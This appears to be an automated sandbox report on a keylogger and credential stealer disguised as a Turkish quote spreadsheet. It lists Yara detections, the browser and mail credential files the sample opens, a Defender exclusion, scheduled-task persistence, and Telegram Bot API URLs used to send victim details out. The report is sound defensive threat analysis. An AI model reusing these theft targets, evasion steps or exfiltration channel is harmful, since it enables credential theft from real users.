Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected MassLogger RAT
Source: Yara match File source: 0000000E.00000002.4512207120.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4514569706.000000000314B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4512203022.0000000000439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4515102020.000000000306E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected MassLogger RAT
Source: Yara match File source: 0000000E.00000002.4512207120.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OnCgVRIhY.exe PID: 7732, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519242 Sample: TEKL#U0130F TALEP VE F#U013... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 2 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 68 17 other signatures 2->68 8 TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe 7 2->8         started        12 OnCgVRIhY.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\Roaming\OnCgVRIhY.exe, PE32 8->38 dropped 40 C:\Users\...\OnCgVRIhY.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp1B98.tmp, XML 8->42 dropped 44 TEKL#U0130F TALEP ...#U0130_xlsx.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 14 TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe 15 2 8->14         started        18 powershell.exe 21 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        72 Multi AV Scanner detection for dropped file 12->72 74 Machine Learning detection for dropped file 12->74 24 OnCgVRIhY.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49738, 49752 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.96.3, 443, 49713, 49716 CLOUDFLARENETUS European Union 14->54 56 checkip.dyndns.com 132.226.8.169, 49706, 49709, 49718 UTMEMUS United States 14->56 76 Loading BitLocker PowerShell Module 18->76 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        78 Tries to steal Mail credentials (via file / registry access) 24->78 80 Tries to harvest and steal browser information (history, passwords, etc) 24->80 36 conhost.exe 26->36         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.8.169 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • Avira URL Cloud: safe
 unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown